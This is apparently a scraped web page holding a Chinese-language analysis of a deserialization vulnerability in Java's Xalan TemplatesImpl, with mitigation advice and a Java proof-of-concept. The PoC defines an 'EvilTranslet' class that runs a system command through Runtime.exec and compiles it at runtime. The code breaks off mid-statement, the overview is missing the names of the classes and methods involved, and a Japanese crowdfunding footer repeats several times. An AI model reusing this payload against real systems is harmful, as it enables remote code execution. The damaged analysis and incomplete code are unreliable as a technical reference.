Java Xalan TemplatesImpl Deserialization Vulnerability Analysis and PoC

漏洞概述 该漏洞存在于 类中，通过 方法实现。攻击者可以通过构造恶意 XML 文件，利用 类的 方法触发反序列化漏洞，从而执行任意代码。 影响范围 受影响组件： 受影响版本：未明确指定具体版本，但通常涉及使用 Xalan 库的应用程序。 修复方案 1. 更新依赖库：确保使用最新版本的 Xalan 库，以修复已知的安全漏洞。 2. 输入验证：对所有输入数据进行严格的验证和过滤，防止恶意 XML 文件的注入。 3. 禁用不安全功能：如果不需要使用 Xalan 库，可以考虑禁用相关功能或移除该库。 4. 使用安全的反序列化机制：避免直接使用 进行反序列化，改用更安全的反序列化方法，如 JSON 或 Protobuf。 POC 代码 ```java import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; import com.sun.org.apache.xml.internal.serializer.SerializationHandler; import java.io.ByteArrayInputStream; import java.io.ObjectInputStream; import java.lang.reflect.Field; import java.nio.charset.StandardCharsets; public class Exploit { public static void main(String[] args) throws Exception { // 编译 EvilTranslet 类 String evilClass = "EvilTranslet"; String evilCode = "public class " + evilClass + " extends com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet implements java.io.Serializable {\n" + " private static final long serialVersionUID = 1L;\n" + " @Override\n" + " public void transform(com.sun.org.apache.xalan.internal.xsltc.DOM document, com.sun.org.apache.xml.internal.serializer.SerializationHandler[] handlers) throws com.sun.org.apache.xalan.internal.xsltc.TransletException {\n" + " try {\n" + " java.lang.Runtime.getRuntime().exec(\"calc\");\n" + " } catch (Exception e) {\n" + " e.printStackTrace();\n" + " }\n" + " }\n" + " @Override\n" + " public void transform(com.sun.org.apache.xalan.internal.xsltc.DOM document, com.sun.org.apache.xml.internal.dtm.DTMAxisIterator iterator, com.sun.org.apache.xml.internal.serializer.SerializationHandler handler) throws com.sun.org.apache.xalan.internal.xsltc.TransletException {\n" + " try {\n" + " java.lang.Runtime.getRuntime().exec(\"calc\");\n" + " } catch (Exception e) {\n" + " e.printStackTrace();\n" + " }\n" + " }\n" + "}"; javax.tools.JavaCompiler compiler = javax.tools.ToolProvider.getSystemJavaCompiler(); javax.tools.StandardJavaFileManager fileManager = compiler.getStandardFileManager(null, null, null); javax.tools.JavaFileObject file = new javax.tools.SimpleJavaFileObject(new java.net.URI("string:///" + evilClass + ".Java"), javax.tools.JavaFileObject.Kind.SOURCE) { @Override public CharSequence getCharContent(boolean ignoreEncodingErrors) { return evilCode; } }; javax.tools.Java

目標達成すべての支援者に感謝 — 100%達成しました！

Java Xalan TemplatesImpl Deserialization Vulnerability Analysis and PoC

このソースからの他の記事

目標達成 すべての支援者に感謝 — 100%達成しました！

Java Xalan TemplatesImpl Deserialization Vulnerability Analysis and PoC

このソースからの他の記事

目標達成すべての支援者に感謝 — 100%達成しました！